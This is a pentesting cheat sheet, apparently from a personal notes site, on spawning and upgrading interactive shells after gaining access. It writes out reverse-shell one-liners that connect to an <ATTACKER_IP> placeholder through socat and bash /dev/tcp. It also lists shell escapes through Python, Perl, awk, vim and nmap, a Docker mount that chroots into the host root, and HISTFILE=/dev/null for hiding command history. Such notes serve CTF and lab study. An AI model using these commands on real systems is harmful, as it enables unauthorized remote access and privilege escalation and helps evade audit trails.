Spawn TTY Shells

🔧 Python Methods

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

You can also use:

python -c 'import os; os.system("/bin/bash")'

🐍 Socat Methods (from attacker and victim)

On attacker (listener):

socat file:`tty`,raw,echo=0 tcp-listen:4444

On victim (reverse shell):

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<ATTACKER_IP>:4444

🦀 Script Method (if available on the system)

script /dev/null -c bash

🧠 Regaining Full Terminal Control

  1. Suspend with Ctrl + Z

  2. On the attacker host:

stty raw -echo; fg reset xterm

📦 Ensuring Terminal Configuration

echo $TERM # Verify terminal type
export TERM=xterm # Set terminal type if needed
export SHELL=/bin/bash # Force bash if possible

🖼 Adjusting Window Size (prevents errors when using programs like nano, htop, etc.)

  1. On the attacker host:

stty size # Example output: 30 127

  1. On the remote shell:

stty rows 30 columns 127

📟 /dev/tcp and Bash Method (interactive reverse shell)

bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1

Once connected, you can upgrade the shell with stty (explained below).

🐚 Shell Upgrade with System Commands (stty and export)

Once you use any of the above methods (like python -c 'pty.spawn(...)'), you can further improve it with:

CTRL+Z   # Pause the shell and return to your local terminal
stty raw -echo; fg

Then, type:

reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <num>    # Adjust size if needed

🧬 With Perl

perl -e 'exec "/bin/bash";'

Or with pseudo-terminal:

perl -e 'use POSIX; POSIX::setsid(); exec "/bin/bash";'

☕ With Java

If Runtime.exec() is accessible:

Runtime.getRuntime().exec("/bin/bash");

(Generally not very useful manually, but useful in Java app exploitation).

🦥 With Lua

lua -e "os.execute('/bin/bash')"

🧱 With Awk

awk 'BEGIN {system("/bin/bash")}'

🧪 With Tcl

tclsh
exec /bin/bash

🧞‍♂️ With vi or vim (command mode)

vim
:!bash

Or:

vim -c ':!bash'

🖋️ With nmap (if it has scripting with --interactive)

nmap --interactive
!sh

💾 With Docker / Chroot / chsh if you have permissions

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Or if you can change your shell:

chsh -s /bin/bash

🧠 Useful Tips

If you have a shell without colors or history, export:

export TERM=xterm-256color
export HISTFILE=/dev/null

To check if a TTY is assigned:

tty
PreviousPassword AttacksNextCTFs

Last updated